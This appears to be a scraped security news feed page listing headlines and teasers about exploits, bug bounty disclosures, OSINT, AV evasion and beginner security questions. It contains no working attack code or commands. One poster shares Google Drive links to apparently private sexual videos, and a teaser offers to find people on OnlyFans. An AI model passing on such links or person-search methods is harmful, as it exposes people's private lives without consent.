    Generally Buffers overflow family targets common protocols like HTTP,SMB,FTP,… ; indeed there is lack of papers, tools, exploits targeting financial/payment protocols like NDC and ISO8385. In this article I present two fuzzers for the protocols ISO8385 and NDC; hoping that it will help other security enthusiasts and developers . The goal of these tools is to quickly find/fix security holes like DOS/Buffer Overflows in the code of the ATM/POS service protocols Below the link to the article : https://www.linkedin.com/pulse/fuzzing-atmpos-protocols-like-boss-karim-reda-fakhir/?published=t submitted by /u/kikikoko1983 [link] [comments]

  • Open

    Give me your rootkit sleuth kit.
    Hey, all. I’m okay versed in computers, but I’m nothing fancy—the extent of my meanderings might be setting up arch Linux in VM or Debian on old laptops I don’t know the password to. Recently my Mac ran into some issues and I believe them to be coming from a USB3 to HDMI cord from amazon. Immediately after plugging in the cord I experienced massive changes in my GUI. The crispness of windows was lost, i had different cursors, and I could resize windows only x and y axis— losing the ability to size diagonally. I was in photoshop at the time and it kept wanting to crash, but before the cord I’d had no problems. Things seemed so funky. The environment was reminiscent of being in a virtual machine or booting an ISO image from a flash drive. After seeing if settings would aid me in returnin…
    Galaxy vs. iPhone for security
    My Galaxy S20 finally crapped out and I need to get a new phone. I'm deciding between getting a Galaxy S23 or an iPhone 14. They seem pretty comparable with some benefits to both but I was wondering what the general consensus is regarding their security. I know Google is pretty notorious for issues with customer data but my knowledge about this is pretty outdated. Thanks! submitted by /u/MoonlightToast [link] [comments]
    Can Google see my HTTPS traffic when using Chrome?
    Can Google see my HTTPS traffic when using Chrome? submitted by /u/Bored-Giraffe [link] [comments]
    What do you think about free Elastic SIEM?
    Hi folks, Do you have experience with Elastic SIEM (subscription - Free and open - Basic)? What are you finding lacking? Would you recommend using this SEM for? Maybe there are some fanatical Elastic SIEM gurus :) in the community who I could be read on this topic? submitted by /u/athanielx [link] [comments]
  • Open

    Diving Deeper Into Pre-created Computer Accounts
    submitted by /u/dmchell [link] [comments]
  • Open

    the open source intelligence (OSINT)
    1.) what is open source intelligence: Continue reading on Medium »
    Week14Blog-OSINT
    Open Source Intelligence (OSINT) has a long history of use in the intelligence community and is a standard tool for security services… Continue reading on Medium »
    Corporate OSINT for Social Engineering
    If your work involves protecting organizations from social engineering attacks, you will most probably also be required to conduct… Continue reading on The First Digit »
    Corporate OSINT for Social Engineering
    If your work involves protecting organizations from social engineering attacks, you will most probably also be required to conduct… Continue reading on Medium »
    Mengenal OSINT Analyst
    Open Source Intelligence (OSINT) Analyst adalah seseorang yang memiliki kemampuan, keterampilan, serta daya analisis yang terstruktur dan… Continue reading on Medium »
  • Open

    Fraudulent claim of business.
    Yelp disclosed a bug submitted by ilpadrino: https://hackerone.com/reports/1422227
    Mail app - blind SSRF via smtpHost parameter
    Nextcloud disclosed a bug submitted by supr4s: https://hackerone.com/reports/1746582
    Mail app - Blind SSRF via Sierve server fonctionnality and sieveHost parameter
    Nextcloud disclosed a bug submitted by supr4s: https://hackerone.com/reports/1741525
    Mail app - blind SSRF via imapHost parameter
    Nextcloud disclosed a bug submitted by supr4s: https://hackerone.com/reports/1736390 - Bounty: $150
  • Open

    What is Broken Access Control bug ?
    Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized… Continue reading on Medium »
    HAI Utility in HackenProof: Get More Bounties with HAI
    As part of the new HAI utility implementation, we’re announcing its extension to HackenProof. Continue reading on Medium »
    Bug Bounty: A Comprehensive Guide | 2023
    Start Hunting the Bugs…Not only For Money…For Satisfaction | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    Owasp 10 vulnerablity
    Top 10 Web Application Security Risks Continue reading on Medium »
    OTP Bypass By Response Manipulation
    wants to earn 3 Digit $$$ in 15 Min read. Continue reading on Medium »
    Automotive Hacking: A Growing Concern
    The rise of the connected car has brought about many new and exciting innovations to the automotive industry. From advanced infotainment… Continue reading on Medium »
    A zero day for demo servers and internal government networks
    hey all, it’s been a long time since i posted here, and much has happened (multiple p1s on various programs :)). but here we are once… Continue reading on Martian Defense Cybersecurity »
    Bug Bounty for Beginners (Part 2): Recon for Modern Bug Bounty Hunting
    This article in the series contains a high-level overview of different tools and techniques used for automating reconnaissance processes… Continue reading on Martian Defense Cybersecurity »
    Top 10 Tools for Ethical Hacking in 2023-Beginers
    Acunetix Continue reading on Medium »
    Rate Limiting -Web Application Vulnerability
    One method of controlling network traffic is rate restriction. It limits the number of times someone may take a certain action — like… Continue reading on Medium »
  • Open

    Metode Alternatif Pada Saat Melakukan Black Box Pentest
    Pada artikel ini, saya akan membahas bagaimana cara “menguji” secara efektif menggunakan metodologi pengujian Black Box. Black Box adalah… Continue reading on MII Cyber Security Consulting Services »
    CRTP Certification Review
    Before I go into the details of my experience with the CRTP certification, I’ll give some background of myself. Continue reading on Medium »
  • Open

    Hacking into Toyota's global supplier management network
    submitted by /u/EatonZ [link] [comments]
  • Open

    SecWiki News 2023-02-06 Review
    在线沙盒的 ATT&CK 映射能力调研 by Avenger SecWiki周刊(第466期) by ourren Yawf: 开源的 Web 漏洞自动化检测工具 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-02-06 Review
    在线沙盒的 ATT&CK 映射能力调研 by Avenger SecWiki周刊(第466期) by ourren Yawf: 开源的 Web 漏洞自动化检测工具 by ourren 更多最新文章,请访问SecWiki
  • Open

    ‍IW Weekly #45: RCE in Avaya Aura Device Services, Bypass Sign-Up Pages, JWT Hacking, Broken…
    No content preview
    ‍IW Weekly #42: $1M bounty explained, GCP takeover, iOS pentesting, Smart Contract…
    No content preview
    ‍IW Weekly #41: VueJS XSS, Critical Car-Vulnerabilities, $1000 IAP Proxy Misconfiguration in…
    No content preview
    Scheduling Recon Scripts with Docker
    Cronjobs are useful for scheduling tasks to run automatically at a specified time or interval. In this tutorial, we’ll go over how to set… Continue reading on InfoSec Write-ups »
    Exploiting CSRF chaining with IDOR
    No content preview
    Understanding and Preventing CSRF AttackAbout CSRF
    No content preview
    Bypass SSL Pinning in Android Phones — Part 2
    No content preview
    Bypass SSL Pinning in Android Phones — Part 1
    No content preview
    Exploring FTP Vulnerabilities through Hands-On Testing in a Virtual Lab Environment
    No content preview
    SERIALIZATION VULNERABILITIES [JAVA][Explained & Exploited]
    No content preview
  • Open

    ‍IW Weekly #45: RCE in Avaya Aura Device Services, Bypass Sign-Up Pages, JWT Hacking, Broken…
    No content preview
    ‍IW Weekly #42: $1M bounty explained, GCP takeover, iOS pentesting, Smart Contract…
    No content preview
    ‍IW Weekly #41: VueJS XSS, Critical Car-Vulnerabilities, $1000 IAP Proxy Misconfiguration in…
    No content preview
    Scheduling Recon Scripts with Docker
    Cronjobs are useful for scheduling tasks to run automatically at a specified time or interval. In this tutorial, we’ll go over how to set… Continue reading on InfoSec Write-ups »
    Exploiting CSRF chaining with IDOR
    No content preview
    Understanding and Preventing CSRF AttackAbout CSRF
    No content preview
    Bypass SSL Pinning in Android Phones — Part 2
    No content preview
    Bypass SSL Pinning in Android Phones — Part 1
    No content preview
    Exploring FTP Vulnerabilities through Hands-On Testing in a Virtual Lab Environment
    No content preview
    SERIALIZATION VULNERABILITIES [JAVA][Explained & Exploited]
    No content preview
  • Open

    ‍IW Weekly #45: RCE in Avaya Aura Device Services, Bypass Sign-Up Pages, JWT Hacking, Broken…
    No content preview
    ‍IW Weekly #42: $1M bounty explained, GCP takeover, iOS pentesting, Smart Contract…
    No content preview
    ‍IW Weekly #41: VueJS XSS, Critical Car-Vulnerabilities, $1000 IAP Proxy Misconfiguration in…
    No content preview
    Scheduling Recon Scripts with Docker
    Cronjobs are useful for scheduling tasks to run automatically at a specified time or interval. In this tutorial, we’ll go over how to set… Continue reading on InfoSec Write-ups »
    Exploiting CSRF chaining with IDOR
    No content preview
    Understanding and Preventing CSRF AttackAbout CSRF
    No content preview
    Bypass SSL Pinning in Android Phones — Part 2
    No content preview
    Bypass SSL Pinning in Android Phones — Part 1
    No content preview
    Exploring FTP Vulnerabilities through Hands-On Testing in a Virtual Lab Environment
    No content preview
    SERIALIZATION VULNERABILITIES [JAVA][Explained & Exploited]
    No content preview
  • Open

    Italy warns hackers targeting known server vulnerability
    Article URL: https://www.reuters.com/world/europe/italy-sounds-alarm-large-scale-computer-hacking-attack-2023-02-05/ Comments URL: https://news.ycombinator.com/item?id=34677909 Points: 1 # Comments: 2
  • Open

    ExploitDev, Malware & Reverse Engineering IRC
    Hey guys! I've got an idea. As you all know ExploitDev, MalwareDev and Reverse Engineering aren't easy fields to get into for newcomers. While there are at least some ressources (CTFs, Pwn College, etc) out there, its still a quite complicated, niche field. May newcomers like myself get overwhelmed pretty soon and even if they decide to go further its a hard, lonely road. Thats where my idea comes in: Why not open an IRC where ExploitDevs help ExploitDevs, and so on. It would be a great way for newcomers to connect, learn together and help each others out as well as a great way for more experienced people to give back to the community. So think about it guys, if you hate it, hate it but if not send me a dm. If enough people are interested i'll open the IRC! Thank you! Hope to find many like minded people! submitted by /u/xenonexi [link] [comments]
  • Open

    FreeBuf早报 | 16 岁黑客声称破解了任天堂 NX;百慕大关基设施突发“严重事故”
    一名 BreachForums 成员声称已经入侵了日本跨国视频游戏公司 Nintendo NX 的游戏机。
    资金预算和员工培训,企业网络安全建设绕不过的两道坎
    23%的高管表示,担心员工的恶意行为会导致公司遭受网络威胁。
    新型勒索软件正攻击全球VMware ESXi 服务器
    攻击者正通过一个远程代码执行漏洞,对全球多地未打补丁的 VMware ESXi 服务器部署新型ESXiArgs 勒索软件。
  • Open

    Vintage Bike Racing
    https://drive.google.com/drive/folders/0B6j57G0xlEZsSFlPUFFYZ09DSGM?resourcekey=0-4sEDlWavnGdoNcJGfFGDKw submitted by /u/False-Celebration930 [link] [comments]
    Anime Girls
    https://drive.google.com/drive/folders/0B_JoWW2c0wtvV3NyNEo2T0FDams?resourcekey=0-YyizbUZ_XPi_p7UzMt_eRw submitted by /u/False-Celebration930 [link] [comments]
    WLIA Public Document Archive
    https://drive.google.com/drive/folders/0BwFTRb4izOv4RVRPWWxyZFU4NDg?resourcekey=0-SD3STU_1pj2rHOLAOyU7Ew submitted by /u/False-Celebration930 [link] [comments]
    Softwares and ebooks
    https://drive.google.com/drive/folders/0B8EZX-tft3DaY3FhTXJUdlB5Vm8?resourcekey=0-upP0FqYgtZrKmEkv_rmK9Q submitted by /u/False-Celebration930 [link] [comments]
    Some 2017 or older meme docs
    https://drive.google.com/drive/folders/0B0JuFoyL_HACYmRDNWI0NTdQckk?resourcekey=0-hao98LVzTcP5tjErBVq7Rg there can be nsfw submitted by /u/False-Celebration930 [link] [comments]
    IDK what to say about this....
    https://drive.google.com/drive/folders/11Lm0WP-Sw77DXUJMq4lYeXcNwvaBUllt this is men porn ... gay porn could be present too. https://drive.google.com/drive/folders/1JSrPXI0oZMBVsus68NBvZdOAoZw309t5 this is someone's toy vid collection submitted by /u/False-Celebration930 [link] [comments]
    Tickle Videos
    https://drive.google.com/drive/folders/12868ht9Mi3uZ7t9kVo6hHXhetmNnHfBx submitted by /u/False-Celebration930 [link] [comments]

  • Open

    Exploit Education's Phoenix Stack Four Challenge Writeup
    Hi everyone, I have just released the writeup for Exploit Education's Phoenix Stack Four challenge. Any reactions & feedback would be most welcome. Thanks in advance! https://medium.com/@secnate/phoenix-challenges-stack-four-6366b29a1223 submitted by /u/ProgrammingBro123 [link] [comments]
    Looking for an ExploitDev Mentor!
    Hey guys! Im a somewhat expercienced programmer, fluent Python, C and Ruby, just getting into Assembly as well. i've got some experience in hacking in general and have been using linux as my main OS for several. I wasnt sure where i want to go for the longest time, but ive decidet to specialize in Reverse Engineeting, Exploit- & Malware Development and Malware Analizing. since ive startet learning i cant stop ive really found my passion. i dont wanna be some random pentester using an endless list of automated tools they barely even understand. i want to know every system and os in and out, i wanna use my creativity and my passion for writing every exploit, every piece of malware myself from scratch. i want to ve able to inferact and talk to my computer direcly. Like all the hackers in the 70s or 80s did. i love dking what i xo so i wanna do it right. like i said programming is not a problem i bring experience in software development, C, Ruby, Python, Assembly as well as SQL, PHP, Ruby on Rais and Java although i gotta say all that Web stuff never really interested me all that much. i wanna work with Computers, Sotware and OS. So is there maybe somewone whod stay in contact, mentor me, could helo me learning or wbo knows even work on that stuff together? i'd be so happy! for more extensive mentoring i'd be haooy to pay you as well! submitted by /u/xenonexi [link] [comments]
  • Open

    Easy Account Takeover on dell subdomain
    السلام عليكم ورحمة الله وبركاته Continue reading on Medium »
    See you in https://pentesting.academy
    After trying Medium to host my blog didn’t match my expectations. Good news is that I was able to export all my old entries, so there is… Continue reading on Medium »
    Blocked User Can Sent messege ||Business Logic Flaw ||Hackerone
    Hello, Amazing hackers . My name is Imamul Mursalin I am a Bug Bounty Hunter. This is my 3rd Write-up, hope You guys will enjoy it and… Continue reading on Medium »
    How I Was Able to Takeover User Accounts via CSRF on an E-Commerce Website
    We’ll discuss the topic of cross-site request forgery (CSRF) vulnerabilities and how it can lead to a one-click account take Continue reading on Medium »
    Character Chaos: Looking Beyond CRLF Injections and Finding Similar Attack Vectors to Manipulate…
    This research all began when I looked at a list of various ASCII characters in the standard and thought to my self “Could there be other… Continue reading on Medium »
  • Open

    CVE-2022-44268 - Arbitrary File Read PoC - PNG generator
    submitted by /u/voidz0r [link] [comments]
    StarHound - CLI tool for importing BloodHound's Active Directory and Azure data (for latest SharpHound/AzureHound data collectors)
    submitted by /u/malacupa [link] [comments]
    The Defender's Guide to OneNote MalDocs
    submitted by /u/SuaveHobo [link] [comments]
    Reversing UK mobile rail tickets
    submitted by /u/Gallus [link] [comments]
  • Open

    MS Office Phishing: Do most phishing attempts exploit Macros?
    If a user has macros disabled in Office, does that mean to say they're now safe from phishing attempts involving MS Office? submitted by /u/baghdadcafe [link] [comments]
    An unidentified filesystem while analyzing a firmware
    Hi, Not sure if that's the right place for such question(s). I was recently analyzing a firmware of some router and while trying to extract the firmware's content I came across a magic saying "PFS/1.0" as for the file-system. As much as I searched, I haven't really found anything related to that, and I was curious to find out what is it. if that's not the place for such question, I'm sorry and would like to know what section is suitable for such questions. ​ thanks submitted by /u/Life_Afternoon_8210 [link] [comments]
    Nmap doesn’t scan my home network on kali using vmware
    Complete beginner to kali linux. I am trying to do a network scan for my home router on kali linux on vm workstation but it doesn’t scan my home router. Only scans the virtual machine network. It has something do with the VMware settings or is it something else I am doing wrong? submitted by /u/Wonderful_Warrior [link] [comments]
  • Open

    Red Team Reconnaissance and find vulnerability through tool
    I’m cyberindia. today I’m going to write about recon step of redteam.here only commands given for recon and find vulnebility thogh active… Continue reading on Medium »
  • Open

    როგორ უნდა იყენებდეს სახელმწიფო და საზოგადოება ღია წყაროებიდან მოპოვებულ ინფორმაციას, “ოსინტ”-ს…
    მასალა გამოყენებულია ჟურნალ “ეკონომისტიდან”. Continue reading on Medium »
    SPY NEWS: 2023 — Week 5
    Summary of the espionage-related news stories for the Week 5 (29 January-4 February) of 2023. Continue reading on Medium »
    OSINT — Both Sides
    Open Source Intelligence (OSINT) refers to the collection and analysis of publicly available information to gather intelligence on a… Continue reading on Medium »
  • Open

    Fix Imagemagick CVE-2022-44268 in Ubuntu packages
    Article URL: https://makandracards.com/operations/532974-fix-cve-2022-44268-in-ubuntu-packages Comments URL: https://news.ycombinator.com/item?id=34666067 Points: 2 # Comments: 0
    KingMe – Chess Cve [pdf]
    Article URL: http://tom7.org/chess/cve.pdf Comments URL: https://news.ycombinator.com/item?id=34663799 Points: 1 # Comments: 0
  • Open

    SecWiki News 2023-02-05 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-02-05 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Validating Tools
    Many times, in the course of our work as analysts (SOC, DFIR, etc.), we run tools...and that's it. But do we often stop to think about why we're running that tool, as opposed to some other tool? Is it because that's the tool everyone we know uses, and we just never thought to ask about another? Not so much the how, but do we really think about the why? The big question, however, is...do we validate our tools? Do we verify that the tools are doing what they are supposed to, what they should be doing, or do we simply accept the output of the tool without question or critical thought? Do we validate our tools against our investigative goals? Back when Chris Pogue and I were working PCI cases as part of the IBM ISS X-Force ERS team, we ran across an instance where we really had to dig in an…
  • Open

    红队攻防之免杀总结
    1、杀毒原理360、腾讯电脑管家、火绒剑、金山毒霸、瑞星等等,这几个杀毒软件领头羊,现在的杀毒软件都无法脱离三个部分,扫描器、病毒库、虚拟机。然而一个杀毒软件做的是否好用,最主要的还是扫描器的速度、准确率以及病毒库是否庞大。1.1、基于特征码的静态扫描技术这种技术很容易被人想到,所以第一代的杀毒软件出现了,他们的杀毒思想就是,我只要匹配到特征字符串就可以判断出来这个文件是一个病毒。但这种方法在当今
  • Open

    Open Redirection
    JetBlue disclosed a bug submitted by doosec101: https://hackerone.com/reports/1267176
    Access to tomcat-manager with default creds
    JetBlue disclosed a bug submitted by doosec101: https://hackerone.com/reports/1267174
  • Open

    🚨 Docker Full Privilege Escalation (CVE-2022-25365): "Breaking Docker Named Pipes SYSTEMatically" 🚨
    submitted by /u/kubiscan [link] [comments]
    🔥 PipeViewer: A new tool for viewing Windows Named Pipes and searching for insecure permissions. 🔥
    submitted by /u/kubiscan [link] [comments]
  • Open

    Linux CFS 调度器:原理、设计与内核实现(2023)
    整理一些 Linux 默认调度器 CFS 相关的东西。CFS、cgroup 等内核技术合力实现了进程的 CPU 资源限额(CPU 带宽控制),这是容器的基础之一。 1 概念及关系 1.1 CFS:进程(task)的公平调度 1.2 CFS 扩展 1.2.1 前提:CONFIG_CGROUPS 1.2.2 前提:CONFIG_CGROUP_SCHED 1.2.3 扩展:支持实时进程组(CONFIG_RT_GROUP_SCHED) 1.2.4 扩展:支持常规进程组(CONFIG_FAIR_GROUP_SCHED) 1.3 常规进程组 CFS 再扩展:支持 CPU 带宽控制(限额) 1.3.1 CFS 存在的问题 1.3.2 CONFIG_CFS_BANDWIDTH 1.4 CFS BANDWITH 近几年改进 1.5 小结:CFS 相关内核编译选项的关系 2 CFS 相关设计 2.1 设计目标和基本原理 2.2 核心概念 2.2.1 vruntime 2.2.2 runqueue 2.2.3 基于时序的红黑树 2.3 调度策略(scheduling policy) 2.3.1 实时进程调度策略 SCHED_FIFO SCHED_RR 2.3.2 常规进程调度策略 SCHED_NORMAL SCHED_BATCH SCHED_IDLE 2.3.3 常规进程 SCHED_NORMAL 和实时进程 SCHED_RR 调度策略的区别 2.3.4 查看或修改进程的调度属性 2.4 调度类(scheduling class) 2.5 进程组调度器扩展(group scheduler extensions) 2.6 CFS 配置项 例子 2.7 CP…

  • Open

    Went on a merchant’s site on safari. I have been on this site many times and never logged into any account on it. Today I went on the website on safari and it was showing another person’s account. I have no idea who they are. No one has access to my phone or connection but me. How is this possible?
    I called the merchant, who is a reputable mainstream merchant, and sent a ticket to their IT. I’m waiting for a response, but in the meantime, I’m wondering how this is possible. I have never signed into any account for this site on safari. I have signed onto my own account for this merchant in Firefox. I do not know who the person is whose account showed up in safari. I wasn’t logged in but when I went to the merchant’s homepage it said “Hi Ashley Moore” and then I saw there was a 5 in the cart icon, I clicked on it and it showed 5 items I have never heard of. It then asked me to log in and showed an email for this Ashley person. What could cause this? Could my safari have been hacked? No one but me has access to my phone. Using iOS 16.1.1, cellular data only, and no vpn submitted by /u/woniwonu [link] [comments]
    Risk of malware spreading over network when using a Linux VM to browse the internet.
    Hey, I just set up LinuxLite as a VM in VirtualBox on my Windows pc, under network I picked NAT. I’m planning to use the VM to browse the internet using Chrome, without downloading or uploading anything. As far as I understand linux users are considerably safe against most types of malware because the malware can’t gain root access and is therefore unable to compromise the whole system, just local files or specific programs. But what about malware that spreads over the network, like worms for example? 1) Could such malware compromise the browser and then spread over my network to non-Linux machines? 2) considering I keep the system and software updated, how likely is that to happen? 3) If the answer to my first question is yes, how can I protect myself against such threats? submitted by /u/younggoodlooking [link] [comments]
    How come a recently released router such as TL-MR100 have deprecated security protocols like TKIP?
    I have been configuring a cellular router to be able to work better on the move. When connecting to it from another iPhone I got the "weak security" tip which stated that WPA/TKIP is deprecated. But how so? I thought TP Link has good products and it's a modern router. I checked and I can't configure it to use WPA3. Why not? Can't it just be done via a firmware update? submitted by /u/BigBootyBear [link] [comments]
    What would be your next goal after a title like DevSecOps Senior Advisor ?
    I know that roles titles can be smoke and mirrors but I just got offered the DevSecOps Senior Advisor role with 3 years of experience and a TC of 133k CAD. The role is a mix of Cloud Sec (AWS and Azure), Data Loss Prevention, automation, in the Canadian financial sector. Since I'm still at the beginning of my career , I tend to think long-term and I'm willing to eventually try new things related to the tech sector, around cybersecurity. What would be the next logical step after this role in a few years, Architecture ? Software Engineering (I don't really code, except I learned C# a few years ago), consulting? Management ? submitted by /u/down_to_earth2 [link] [comments]
    found a security site from Sec.gov
    anyone know how to decipher this site? it mentions JPmorgan chase https://www.sec.gov/Archives/edgar/data/19617/000119312516528232/0001193125-16-528232.txt submitted by /u/Randomthings55 [link] [comments]
    Splitting DNS DHCP for guest network
    I have a setup where guest WiFi users get IP address and DNS servers from the same resources that service staff computers. These are off AD servers. While the ACLs limit access we have no control over the endpoints and have seen heavily loaded malware laptops join. So I want these servers be not AD, be on an island themselves, and be hardened. If they’re breached they impacted on guest WiFi. Think through other parts this - I need a way into from staff side, so a bastion? Or VPN? Anything else I should consider? I do need internal DNS as some resources are internal but those are web sites in a DMZ. Appreciate any advice ideas thoughts! submitted by /u/Shujolnyc [link] [comments]
    Should you regenerate pass phrases to find one that's comfortable?
    I saw this advice sometime earlier, and while it improves memorability, doesn't this make you susceptible to attacks because you are more likely to choose a much smaller subset of diceware's dictionary? It has 7776 words, and I personally as a non-native English speaker would likely choose only 500 of them willingly. If someone was able to figure them out (the 500 words) through some kind of analysis am I not screwed in this case? submitted by /u/SteveSonOfJobs [link] [comments]
    Zero Trust
    How do you go about defining what a user can access? So right now say you have the sub standard VPN where the user can reach the front door of 99% of applications within the enterprise. How do you go about creating the user profile to know what they need to access and eliminate the rest? Thanks submitted by /u/brasschaser [link] [comments]
    Is there a separate discipline geared towards securing the backend architecture of web apps?
    I work in application security and have been joining in on some discussions to assess our products' security in depth. Some of these conversations involve topics that I have not really had to contend with so far. For example, storage location of the database connection string, management of db encryption key, code deployment method, etc -- things that have more to do with I guess the back end architecture? As an appsec engineer, I've mostly been dealing directly with web app security (OWASP top ten, SAST and DAST scanning, API testing, etc), and the learning materials I've used for appsec and for my certs never really seemed to discuss backend architecture related to the examples above. Is there a specific discipline for this within cybersec? I'm mostly interested in finding resources to study that aspect of security and build my skills. TIA! Edit: maybe 'backend architecture' is not the right terminology. Unfortunately I don't have a background in CS or development so I'm always getting tripped up with terminologies. submitted by /u/desmond_4815162342 [link] [comments]
    Clicking .ps1 Insecure?
    Can someone explain to me why running a .ps1 script by double clicking on it is considered insecure? I set the execution policy to remote signed, so nothing can execute from external origin that is not signed. I'm open to using a more secure method, but I am unaware of what that solution is. Link to my original post below in regards to editing a small script I wrote. https://www.reddit.com/r/PowerShell/comments/10ssoxa/stop_powershell_script_from_closing_powershell/?utm_source=share&utm_medium=android_app&utm_name=androidcss&utm_term=1&utm_content=share_button submitted by /u/defaultaro [link] [comments]
  • Open

    How to search for someone on OnlyFans, like an expert?
    Did you know, onlyFans has over 170 million users subscribed? That’s 50% more people than the whole population of the USA! or, over 2.5… Continue reading on Medium »
    OSINT (Open source intelligence tools used in 2023)
    Ive curated a list of open source intelligence tools which are used by intelligence enthusiasts, coders and hackers and also added… Continue reading on Medium »
    SOC143 — Password Stealer Detected
    Let’s start to investigate this stealer security incident. Firstly, we can see the sender, recipient address, incident happening time and… Continue reading on Medium »
    Update v2 (Malaysian OSINT resource list)
    This is the second update for the Malaysian OSINT resource list. Basically, I just follow the OSINT Skills Chart for the base Continue reading on Medium »
  • Open

    DoS and arbitrary file read in (ImageMagick: The hidden vulnerability behind your online images)
    submitted by /u/Mini_True [link] [comments]
  • Open

    Top 21 Tools for Penetration Testing
    Penetration testing, also known as pen testing, is an important aspect of cybersecurity that helps organizations identify and address… Continue reading on Medium »
    “How to succeed in bug bounty” a framework.
    Hey there reader, are you hoping to make millions with bug bounty? That’s quite the ambition you’ve got there, and while I’m not going to… Continue reading on Medium »
    BE PART OF OUR APOLLO COMMUNITY!
    BugBase Apollo is a community of highly skilled security experts and hackers passionate about making the digital world safer. These elite… Continue reading on Medium »
    Web 3.0 : The Future of Web and CyberSecurity
    Hello my infosec and tech mates, I hope you all are doing great at your lives even am doing great right now, (can’t say not really). So… Continue reading on Medium »
    CSRF Where Token is duplicated in Cookie | 2023
    Portswigger Cross-Site Request Forgery Lab Simple Solution | Karthikeyan Nagaraj Continue reading on InfoSec Write-ups »
    Social mídia takeover. Como consegui ' tomar conta ' do perfil de um hacker no Twitter.
    Meu nome é Diego, e vamos ao que interessa. Continue reading on Medium »
  • Open

    SecWiki News 2023-02-04 Review
    开源软件供应链攻击回顾 by ourren 美国NSA安全运营关键原则 by ourren 25美元破解Starlink 星链终端路由器 by ourren C2服务器隐藏与Linux上线 by 路人甲 分享Jar包分析工具:jar-analyzer by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2023-02-04 Review
    开源软件供应链攻击回顾 by ourren 美国NSA安全运营关键原则 by ourren 25美元破解Starlink 星链终端路由器 by ourren C2服务器隐藏与Linux上线 by 路人甲 分享Jar包分析工具:jar-analyzer by ourren 更多最新文章,请访问SecWiki
  • Open

    2023版漏洞评估工具Top10(含容器方向)
    本文仅推荐OSV-Scanner、OpenSCAP、ZAP这几款支持或包含一部分容器安全扫描功能的开源工具。
    ATT&CK v10版本战术介绍—持久化(一)
    本期主要介绍了持久化战术前6项子技术理论知识,下期将给大家介绍持久化战术其他子技术。
  • Open

    CVE-2021-21974 is open for ESXi 6
    Article URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21974 Comments URL: https://news.ycombinator.com/item?id=34651642 Points: 3 # Comments: 1

  • Open

    Introducción a la Ciberseguridad -Capítulo 0
    Parte 1 Continue reading on Medium »
  • Open

    Gartner Peer Insights widget - postMessage DOM XSS vulnerability
    submitted by /u/Gallus [link] [comments]
    How to Develop Intuition for Security Research: Apply the Scientific Method
    submitted by /u/crypt_keepr [link] [comments]
    PixPirate: a new Brazilian Banking Trojan | Cleafy LABS
    submitted by /u/f3d_0x0 [link] [comments]
    Adobe Acrobat Reader - resetForm - CAgg UaF - RCE Exploit - CVE-2023-21608
    submitted by /u/hacksysteam [link] [comments]
    Pre-Auth RCE in Aspera Faspex: Case Guide for Auditing Ruby on Rails
    submitted by /u/Mempodipper [link] [comments]
    TC39 proposal for mitigating prototype pollution
    submitted by /u/Gallus [link] [comments]
  • Open

    Password-stealing “vulnerability” reported in KeePass – bug or feature?
    Article URL: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/ Comments URL: https://news.ycombinator.com/item?id=34648654 Points: 1 # Comments: 1
  • Open

    Another EnCase report question, timezone setting
    I changed the timezone on the device to what it was, but my report is still showing my timezone when items/images are listed for created/written/accessed. Is that normal behavior? Like in the evidence it shows the proper TimeZone/Time but once an item is bookmarked and in the report it shows my timezone in the report. Is there a way to change this? Sorry for asking here again, I really don't know where to turn to. I've taken training and I have the books, but little things like this and the HEX thing weren't explicitly mentioned. submitted by /u/dardack [link] [comments]
    Experiencing very slow verification speed using FTK Imager
    Users are experiencing significantly slow FTK Imager verification times when verifying their images from our file servers (WS2019 Standard VMs) for their processed images. Processing to our file servers may go at 60 MB/s yet verifying those same images may go at 7 MB/s. This is happening for all users regardless of what data they are trying to verify. We host the virtual file servers on Dell R730s running Hyper-V. I have tried setting exclusions in Windows Defender for the network locations, it does speed up some image verification as it no longer scans the files, but it always seems to sink back down to 7-15 MB/s for most images. When the data is verified locally and not on the network, verification speeds seem to match the processing speeds of 60 MB/s. The file servers themselves have 10Gb vNICs and handle data copying easily and doesn't slow down when transferring data to our users, data is still transferred around 80-90 MB/s to th user's 1Gb computers. Any insight is appreciated, these slow verification times are hindering workflow! Our environment: -Clients have Dell T7920s, T5820s, T7910s -Servers are Dell R730s with SAS connections to storage enclosures running HDDs and using Microsoft Storage Spaces Direct. -Connections are 10Gb to switches and 1Gb to user computers. submitted by /u/defaultuser100 [link] [comments]
  • Open

    Update to the REF2924 intrusion set and related campaigns
    submitted by /u/dmchell [link] [comments]
  • Open

    Top sites for passive reconnaissance
    Passive reconnaissance is the process of collecting information in a covert manner about an intended target without the target knowing… Continue reading on Medium »
    Get Into Cybersecurity in 2023: A Step-by-Step Guide
    Unlocking the Secrets to a Successful Cybersecurity Career: A Step-by-Step Guide for Beginners Continue reading on InfoSec Write-ups »
    Bug Zero at a Glance [Week 28 January — 03 February]
    What happened with Bug Zero? Continue reading on Bug Zero »
    Research | How can Local File Inclusion lead to RCE?
    Local File Inclusion (LFI) is a type of vulnerability commonly found in web applications. It allows an attacker to include a local file… Continue reading on Medium »
    WebPenetration Tester Roadmap
    Sec 542 & 642 notes in here: https://lnkd.in/dkeGVvy Continue reading on Medium »
    Play with Google, Twitter, Apple, Dell
    This story of how I find vulnerabilities in google, Twitter, apple, and dell for fun after more than 40 tries Continue reading on Medium »
    Password Reset Poisoning with Host Header Injection
    Hey folks, I am Bharat Singh a Security researcher and Bug Hunter. I am here with an amazing writeup about Password Reset Poisoning with… Continue reading on InfoSec Write-ups »
    Broad scope hacking flowchart
    Continue reading on Medium »
    Jenkins hacking community checklist
    Enum and information: Continue reading on Medium »
    What does HTTP Response Status Code Says?
    We Can Looks Most Commonly Shown Status Code Along With Their Saying. Continue reading on Medium »
  • Open

    IMINT — Inteligencia de Imágenes
    El IMINT o Inteligencia de Imágenes, es una disciplina dentro de la Inteligencia que consiste en el análisis y/o explotación de imágenes… Continue reading on Medium »
  • Open

    Tips on enumerating unknown APIs in my environment?
